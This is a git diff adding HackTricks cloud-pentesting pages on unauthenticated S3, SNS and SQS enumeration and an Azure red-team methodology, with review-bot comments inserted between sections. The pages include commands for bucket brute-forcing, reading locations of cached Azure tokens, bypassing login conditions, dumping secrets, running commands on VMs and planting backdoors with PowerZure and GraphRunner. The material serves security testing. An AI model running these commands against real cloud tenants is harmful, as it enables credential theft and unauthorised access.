+cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
+
+## Generate the final wordlist
+cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
+
+## Call s3scanner
+s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt  | grep bucket_exists
+
+ +#### Loot S3 Buckets + +Given S3 open buckets, [**BucketLoot**](https://github.com/redhuntlabs/BucketLoot) can automatically **search for interesting information**. + +### Find the Region + +You can find all the supported regions by AWS in [**https://docs.aws.amazon.com/general/latest/gr/s3.html**](https://docs.aws.amazon.com/general/latest/gr/s3.html) + +#### By DNS + +You can get the region of a bucket with a **`dig`** and **`nslookup`** by doing a **DNS request of the discovered IP**: + +```bash +dig flaws.cloud +;; ANSWER SECTION: +flaws.cloud. 5 IN A 52.218.192.11 + +nslookup 52.218.192.11 +Non-authoritative answer: +11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com. +``` + +Check that the resolved domain have the word "website".\ +You can access the static website going to: `flaws.cloud.s3-website-us-west-2.amazonaws.com`\ +or you can access the bucket visiting: `flaws.cloud.s3-us-west-2.amazonaws.com` + +#### By Trying + +If you try to access a bucket, but in the **domain name you specify another region** (for example the bucket is in `bucket.s3.amazonaws.com` but you try to access `bucket.s3-website-us-west-2.amazonaws.com`, then you will be **indicated to the correct location**: + +![](<../../../.gitbook/assets/image (106).png>) + +### Enumerating the bucket + +To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored. 
+ +Open to everyone: + +![](<../../../.gitbook/assets/image (201).png>) + +Private: + +![](<../../../.gitbook/assets/image (83).png>) + +You can also check this with the cli: + +```bash +#Use --no-sign-request for check Everyones permissions +#Use --profile to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions +#--recursive if you want list recursivelyls +#Opcionally you can select the region if you now it +aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile ] [ --recursive] [--region us-west-2] +``` + +If the bucket doesn't have a domain name, when trying to enumerate it, **only put the bucket name** and not the whole AWSs3 domain. Example: `s3://` + +### Public URL template + +``` +https://{user_provided}.s3.amazonaws.com +``` + +### Get Account ID from public Bucket + +It's possible to determine an AWS account by taking advantage of the new **`S3:ResourceAccount`** **Policy Condition Key**. This condition **restricts access based on the S3 bucket** an account is in (other account-based policies restrict based on the account the requesting principal is in).\ +And because the policy can contain **wildcards** it's possible to find the account number **just one number at a time**. + +This tool automates the process: + +```bash +# Installation +pipx install s3-account-search +pip install s3-account-search +# With a bucket +s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket +# With an object +s3-account-search arn:aws:iam::123456789012:role/s3_read s3://my-bucket/path/to/object.ext +``` + +This technique also works with API Gateway URLs, Lambda URLs, Data Exchange data sets and even to get the value of tags (if you know the tag key). You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. 
+ +### Confirming a bucket belongs to an AWS account + +As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/)**, if you have permissions to list a bucket** it’s possible to confirm an accountID the bucket belongs to by sending a request like: + +```bash +curl -X GET "[bucketname].amazonaws.com/" \ +-H "x-amz-expected-bucket-owner: [correct-account-id]" + + +... +``` + +If the error is an “Access Denied” it means that the account ID was wrong. + +### Used Emails as root account enumeration + +As explained in [**this blog post**](https://blog.plerion.com/things-you-wish-you-didnt-need-to-know-about-s3/), it's possible to check if an email address is related to any AWS account by **trying to grant an email permissions** over a S3 bucket via ACLs. If this doesn't trigger an error, it means that the email is a root user of some AWS account: + +```python +s3_client.put_bucket_acl( + Bucket=bucket_name, + AccessControlPolicy={ + 'Grants': [ + { + 'Grantee': { + 'EmailAddress': 'some@emailtotest.com', + 'Type': 'AmazonCustomerByEmail', + }, + 'Permission': 'READ' + }, + ], + 'Owner': { + 'DisplayName': 'Whatever', + 'ID': 'c3d78ab5093a9ab8a5184de715d409c2ab5a0e2da66f08c2f6cc5c0bdeadbeef' + } + } +) +``` + +## References + +* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) +* [https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/](https://cloudar.be/awsblog/finding-the-account-id-of-any-public-s3-bucket/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md new file mode 100644 index 0000000000..416a48e0e0 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md @@ -0,0 +1,47 @@ +# AWS - SNS Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
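Review bot: in aws-s3-unauthenticated-enum.md, the `put_bucket_acl` snippet under "Used Emails as root account enumeration" is not runnable as shown and its side effect is not stated: `s3_client` is never created (it needs `import boto3` and `s3_client = boto3.client('s3')`), and because `AccessControlPolicy` replaces the bucket's entire ACL and must carry the bucket owner's real canonical `ID` (the `...deadbeef` value is a placeholder), the call has to be pointed at a bucket the tester controls, and the text should say that a successful call has actually granted `READ` to that email, so the ACL needs restoring afterwards. Two smaller fixes in the same file: the request `curl -X GET "[bucketname].amazonaws.com/"` in "Confirming a bucket belongs to an AWS account" is missing the scheme and the `s3` label (the page's own template is `https://{user_provided}.s3.amazonaws.com`), and the `aws s3 ls` comment block has lost the `--profile` placeholder and the example bucket name after `s3://`, plus typos (`recursivelyls`, `Opcionally`, `now it`). The "By Trying" section could also mention that the redirect response carries the bucket's region in the `x-amz-bucket-region` header, which avoids guessing regions one at a time.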
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SNS + +For more information about SNS check: + +{% content-ref url="../aws-services/aws-sns-enum.md" %} +[aws-sns-enum.md](../aws-services/aws-sns-enum.md) +{% endcontent-ref %} + +### Open to All + +When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic: + +
+ +So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md new file mode 100644 index 0000000000..5926225b3e --- /dev/null +++ b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md @@ -0,0 +1,49 @@ +# AWS - SQS Unauthenticated Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
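Review bot: in aws-sns-unauthenticated-enum.md, the content-ref points at `../aws-services/aws-sns-enum.md` while the sibling SQS page added in this same change points at `../aws-services/aws-sqs-and-sns-enum.md`; one of these targets does not exist and will render as a broken link in GitBook, so align both on the real file. The "Open to All" section should also say what "check" means in practice: brute-forcing topic names requires the full ARN `arn:aws:sns:<region>:<account-id>:<name>`, so the account ID and region must already be known (the S3 page in this change shows a way to obtain an account ID), and the actual test is one `aws sns publish --topic-arn ... --message ...` and one `aws sns subscribe --topic-arn ... --protocol ... --notification-endpoint ...` attempt per candidate.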
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SQS + +For more information about SQS check: + +{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} +[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) +{% endcontent-ref %} + +### Public URL template + +``` +https://sqs.[region].amazonaws.com/[account-id]/{user_provided} +``` + +### Check Permissions + +It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/README.md b/pentesting-cloud/azure-security/README.md new file mode 100644 index 0000000000..02a5e08569 --- /dev/null +++ b/pentesting-cloud/azure-security/README.md @@ -0,0 +1,423 @@ +# Azure Pentesting + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
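Review bot: in aws-sqs-unauthenticated-enum.md, "Check Permissions" tells the reader to try the queue ARN, but the `aws sqs` commands (`send-message`, `receive-message`, `get-queue-attributes`) take `--queue-url`, not an ARN; the URL is exactly the template given just above, `https://sqs.[region].amazonaws.com/[account-id]/{user_provided}`, so the section should say to rebuild the URL from the ARN's region, account ID and queue name and then attempt a `receive-message` and a `send-message` against it. It would also help to state that the misconfiguration being described is a queue policy with `"Principal": "*"` (that is what "everyone in AWS" means here), so readers with credentials know what to look for in `get-queue-attributes --queue-url ... --attribute-names Policy`.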
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +{% content-ref url="az-basic-information/" %} +[az-basic-information](az-basic-information/) +{% endcontent-ref %} + +## Azure Pentester/Red Team Methodology + +In order to audit an AZURE environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal Azure services and **external services** connected. + +From a Red Team point of view, the **first step to compromise an Azure environment** is to manage to obtain some **credentials** for Azure AD. Here you have some ideas on how to do that: + +* **Leaks** in github (or similar) - OSINT +* **Social** Engineering +* **Password** reuse (password leaks) +* Vulnerabilities in Azure-Hosted Applications + * [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint + * **Local File Read** + * `/home/USERNAME/.azure` + * `C:\Users\USERNAME\.azure` + * The file **`accessTokens.json`** in `az cli` before 2.30 - Jan2022 - stored **access tokens in clear text** + * The file **`azureProfile.json`** contains **info** about logged user. + * **`az logout`** removes the token. + * Older versions of **`Az PowerShell`** stored **access tokens** in **clear** text in **`TokenCache.dat`**. It also stores **ServicePrincipalSecret** in **clear**-text in **`AzureRmContext.json`**. The cmdlet **`Save-AzContext`** can be used to **store** **tokens**.\ + Use `Disconnect-AzAccount` to remove them. 
+* 3rd parties **breached** +* **Internal** Employee +* [**Common Phishing**](https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology) (credentials or Oauth App) + * [Device Code Authentication Phishing](az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) +* [Azure **Password Spraying**](az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) + +Even if you **haven't compromised any user** inside the Azure tenant you are attacking, you can **gather some information** from it: + +{% content-ref url="az-unauthenticated-enum-and-initial-entry/" %} +[az-unauthenticated-enum-and-initial-entry](az-unauthenticated-enum-and-initial-entry/) +{% endcontent-ref %} + +{% hint style="info" %} +After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +{% endhint %} + +## Basic Enumeration + +{% hint style="info" %} +Remember that the **noisiest** part of the enumeration is the **login**, not the enumeration itself. +{% endhint %} + +### SSRF + +If you found a SSRF in a machine inside Azure check this page for tricks: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} + +### Bypass Login Conditions + +
+ +In cases where you have some valid credentials but you cannot login, these are some common protections that could be in place: + +* **IP whitelisting** -- You need to compromise a valid IP +* **Geo restrictions** -- Find where the user lives or where are the offices of the company and get a IP from the same city (or contry at least) +* **Browser** -- Maybe only a browser from certain OS (Windows, Linux, Mac, Android, iOS) is allowed. Find out which OS the victim/company uses. +* You can also try to **compromise Service Principal credentials** as they usually are less limited and its login is less reviewed + +After bypassing it, you might be able to get back to your initial setup and you will still have access. + +### Subdomain Takeover + +* [https://godiego.co/posts/STO-Azure/](https://godiego.co/posts/STO-Azure/) + +### Whoami + +{% hint style="danger" %} +Learn **how to install** az cli, AzureAD and Az PowerShell in the [**Az - Entra ID**](az-services/az-azuread.md) section. +{% endhint %} + +One of the first things you need to know is **who you are** (in which environment you are): + +{% tabs %} +{% tab title="az cli" %} +```bash +az account list +az account tenant list # Current tenant info +az account subscription list # Current subscription info +az ad signed-in-user show # Current signed-in user +az ad signed-in-user list-owned-objects # Get owned objects by current user +az account management-group list #Not allowed by default +``` +{% endtab %} + +{% tab title="AzureAD" %} +```powershell +#Get the current session state +Get-AzureADCurrentSessionInfo +#Get details of the current tenant +Get-AzureADTenantDetail +``` +{% endtab %} + +{% tab title="Az PowerShell" %} +```powershell +# Get the information about the current context (Account, Tenant, Subscription etc.) 
+Get-AzContext +# List all available contexts +Get-AzContext -ListAvailable +# Enumerate subscriptions accessible by the current user +Get-AzSubscription +#Get Resource group +Get-AzResourceGroup +# Enumerate all resources visible to the current user +Get-AzResource +# Enumerate all Azure RBAC role assignments +Get-AzRoleAssignment # For all users +Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com # For current user +``` +{% endtab %} +{% endtabs %} + +{% hint style="danger" %} +Oone of the most important commands to enumerate Azure is **`Get-AzResource`** from Az PowerShell as it lets you **know the resources your current user has visibility over**. + +You can get the same info in the **web console** going to [https://portal.azure.com/#view/HubsExtension/BrowseAll](https://portal.azure.com/#view/HubsExtension/BrowseAll) or searching for "All resources" +{% endhint %} + +### ENtra ID Enumeration + +By default, any user should have **enough permissions to enumerate** things such us, users, groups, roles, service principals... (check [default AzureAD permissions](az-basic-information/#default-user-permissions)).\ +You can find here a guide: + +{% content-ref url="az-services/az-azuread.md" %} +[az-azuread.md](az-services/az-azuread.md) +{% endcontent-ref %} + +{% hint style="info" %} +Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ +In the following section you can check some ways to **enumerate some common services.** +{% endhint %} + +## App Service SCM + +Kudu console to log in to the App Service 'container'. + +## Webshell + +Use portal.azure.com and select the shell, or use shell.azure.com, for a bash or powershell. The 'disk' of this shell are stored as an image file in a storage-account. + +## Azure DevOps + +Azure DevOps is separate from Azure. 
It has repositories, pipelines (yaml or release), boards, wiki, and more. Variable Groups are used to store variable values and secrets. + +## Debug | MitM az cli + +Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending: + +```bash +az account management-group list --output table --debug +``` + +In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do: + +{% tabs %} +{% tab title="Bash" %} +```bash +export ADAL_PYTHON_SSL_NO_VERIFY=1 +export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 +export HTTPS_PROXY="http://127.0.0.1:8080" +export HTTP_PROXY="http://127.0.0.1:8080" + +# If this is not enough +# Download the certificate from Burp and convert it into .pem format +# And export the following env variable +openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM +export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem +``` +{% endtab %} + +{% tab title="PS" %} +```bash +$env:ADAL_PYTHON_SSL_NO_VERIFY=1 +$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1 +$env:HTTPS_PROXY="http://127.0.0.1:8080" +$env:HTTP_PROXY="http://127.0.0.1:8080" +``` +{% endtab %} +{% endtabs %} + +## Automated Recon Tools + +### [**ROADRecon**](https://github.com/dirkjanm/ROADtools) + +```powershell +cd ROADTools +pipenv shell +roadrecon auth -u test@corp.onmicrosoft.com -p "Welcome2022!" 
+roadrecon gather +roadrecon gui +``` + +### [Monkey365](https://github.com/silverhack/monkey365) + +{% code overflow="wrap" %} +```powershell +Import-Module monkey365 +Get-Help Invoke-Monkey365 +Get-Help Invoke-Monkey365 -Detailed +Invoke-Monkey365 -IncludeEntraID -ExportTo HTML -Verbose -Debug -InformationAction Continue +Invoke-Monkey365 - Instance Azure -Analysis All -ExportTo HTML +``` +{% endcode %} + +### [**Stormspotter**](https://github.com/Azure/Stormspotter) + +```powershell +# Start Backend +cd stormspotter\backend\ +pipenv shell +python ssbackend.pyz + +# Start Front-end +cd stormspotter\frontend\dist\spa\ +quasar.cmd serve -p 9091 --history + +# Run Stormcollector +cd stormspotter\stormcollector\ +pipenv shell +az login -u test@corp.onmicrosoft.com -p Welcome2022! +python stormspotter\stormcollector\sscollector.pyz cli +# This will generate a .zip file to upload in the frontend (127.0.0.1:9091) +``` + +### [**AzureHound**](https://github.com/BloodHoundAD/AzureHound) + +```powershell +# You need to use the Az PowerShell and Azure AD modules: +$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force +$creds = New-Object System.Management.Automation.PSCredential ("test@corp.onmicrosoft.com", $passwd) +Connect-AzAccount -Credential $creds + +Import-Module AzureAD\AzureAD.psd1 +Connect-AzureAD -Credential $creds + +# Launch AzureHound +. 
AzureHound\AzureHound.ps1 +Invoke-AzureHound -Verbose + +# Simple queries +## All Azure Users +MATCH (n:AZUser) return n.name +## All Azure Applications +MATCH (n:AZApp) return n.objectid +## All Azure Devices +MATCH (n:AZDevice) return n.name +## All Azure Groups +MATCH (n:AZGroup) return n.name +## All Azure Key Vaults +MATCH (n:AZKeyVault) return n.name +## All Azure Resource Groups +MATCH (n:AZResourceGroup) return n.name +## All Azure Service Principals +MATCH (n:AZServicePrincipal) return n.objectid +## All Azure Virtual Machines +MATCH (n:AZVM) return n.name +## All Principals with the ‘Contributor’ role +MATCH p = (n)-[r:AZContributor]->(g) RETURN p + +# Advanced queries +## Get Global Admins +MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p +## Owners of Azure Groups +MATCH p = (n)-[r:AZOwns]->(g:AZGroup) RETURN p +## All Azure Users and their Groups +MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p +## Privileged Service Principals +MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p +## Owners of Azure Applications +MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p +## Paths to VMs +MATCH p = (n)-[r]->(g: AZVM) RETURN p +## Paths to KeyVault +MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p +## Paths to Azure Resource Group +MATCH p = (n)-[r]->(g:AZResourceGroup) RETURN p +## On-Prem users with edges to Azure +MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p +## All Azure AD Groups that are synchronized with On-Premise AD +MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n +``` + +### [Azucar](https://github.com/nccgroup/azucar) + +```bash +# You should use an account with at least read-permission on the assets you want to access +git clone https://github.com/nccgroup/azucar.git +PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File + +PS> 
.\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT +PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 +PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000 + +# resolve the TenantID for an specific username +PS> .\Azucar.ps1 -ResolveTenantUserName user@company.com +``` + +### [**MicroBurst**](https://github.com/NetSPI/MicroBurst) + +``` +Import-Module .\MicroBurst.psm1 +Import-Module .\Get-AzureDomainInfo.ps1 +Get-AzureDomainInfo -folder MicroBurst -Verbose +``` + +### [**PowerZure**](https://github.com/hausec/PowerZure) + +```powershell +Connect-AzAccount +ipmo C:\Path\To\Powerzure.psd1 +Get-AzureTarget + +# Reader +$ Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails + +# Contributor +$ Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami" +$ Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml" +$ Get-AllSecrets # AllAppSecrets, AllKeyVaultContents +$ Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk + +# Owner +$ Set-Role -Role Contributor -User test@contoso.com -Resource Win10VMTest + +# Administrator +$ Create-Backdoor, Execute-Backdoor +``` + +### [**GraphRunner**](https://github.com/dafthack/GraphRunner/wiki/Invoke%E2%80%90GraphRunner) + +```powershell + +#Get-GraphTokens +#A good place to start is to authenticate with the Get-GraphTokens module. This module will launch a device-code login, allowing you to authenticate the session from a browser session. Access and refresh tokens will be written to the global $tokens variable. 
To use them with other GraphRunner modules use the Tokens flag (Example. Invoke-DumpApps -Tokens $tokens) +Import-Module .\GraphRunner.ps1 +Get-GraphTokens + +#Invoke-GraphRecon +#This module gathers information about the tenant including the primary contact info, directory sync settings, and user settings such as if users have the ability to create apps, create groups, or consent to apps. +Invoke-GraphRecon -Tokens $tokens -PermissionEnum + +#Invoke-DumpCAPS +#A module to dump conditional access policies from a tenant. +Invoke-GraphRecon -Tokens $tokens -PermissionEnum + +#Invoke-DumpCAPS +#A module to dump conditional access policies from a tenant. +Invoke-DumpCAPS -Tokens $tokens -ResolveGuids + +#Invoke-DumpApps +#This module helps identify malicious app registrations. It will dump a list of Azure app registrations from the tenant including permission scopes and users that have consented to the apps. Additionally, it will list external apps that are not owned by the current tenant or by Microsoft's main app tenant. This is a good way to find third-party external apps that users may have consented to. +Invoke-DumpApps -Tokens $tokens + +#Get-AzureADUsers +#Gather the full list of users from the directory. +Get-AzureADUsers -Tokens $tokens -OutFile users.txt + +#Get-SecurityGroups +#Create a list of security groups along with their members. +Get-SecurityGroups -AccessToken $tokens.access_token + +G#et-UpdatableGroups +#Gets groups that may be able to be modified by the current user +Get-UpdatableGroups -Tokens $tokens + +#Get-DynamicGroups +#Finds dynamic groups and displays membership rules +Get-DynamicGroups -Tokens $tokens + +#Get-SharePointSiteURLs +#Gets a list of SharePoint site URLs visible to the current user +Get-SharePointSiteURLs -Tokens $tokens + +#Invoke-GraphOpenInboxFinder +#This module attempts to locate mailboxes in a tenant that have allowed other users to read them. 
By providing a userlist the module will attempt to access the inbox of each user and display if it was successful. The access token needs to be scoped to Mail.Read.Shared or Mail.ReadWrite.Shared for this to work. +Invoke-GraphOpenInboxFinder -Tokens $tokens -Userlist users.txt + +#Get-TenantID +#This module attempts to gather a tenant ID associated with a domain. +Get-TenantID -Domain + +#Invoke-GraphRunner +#Runs Invoke-GraphRecon, Get-AzureADUsers, Get-SecurityGroups, Invoke-DumpCAPS, Invoke-DumpApps, and then uses the default_detectors.json file to search with Invoke-SearchMailbox, Invoke-SearchSharePointAndOneDrive, and Invoke-SearchTeams. +Invoke-GraphRunner -Tokens $tokens +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-basic-information/README.md b/pentesting-cloud/azure-security/az-basic-information/README.md new file mode 100644 index 0000000000..003c4ae03e --- /dev/null +++ b/pentesting-cloud/azure-security/az-basic-information/README.md @@ -0,0 +1,414 @@ +# Az - Basic Information + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
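Review bot: in pentesting-cloud/azure-security/README.md, the GraphRunner block has a copy-paste error: the first `#Invoke-DumpCAPS` comment is followed by a second `Invoke-GraphRecon -Tokens $tokens -PermissionEnum` call instead of `Invoke-DumpCAPS`, and the correct comment/command pair then appears immediately below, so the recon runs twice; drop the first pair. In the same block `G#et-UpdatableGroups` should be `#Get-UpdatableGroups`, and `Get-TenantID -Domain` has lost its domain argument. Elsewhere in the file: `Invoke-Monkey365 - Instance Azure` has a stray space inside `-Instance`; the PowerZure examples prefix PowerShell commands with `$` shell prompts, which breaks copy-paste; and there are typos in a heading and a callout (`ENtra ID Enumeration`, `Oone of the most important commands`). The "App Service SCM" and "Webshell" sections are one-line fragments (`Kudu console to log in to the App Service 'container'.`) and need at least a sentence on how the Kudu/SCM endpoint is reached and what access it gives.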
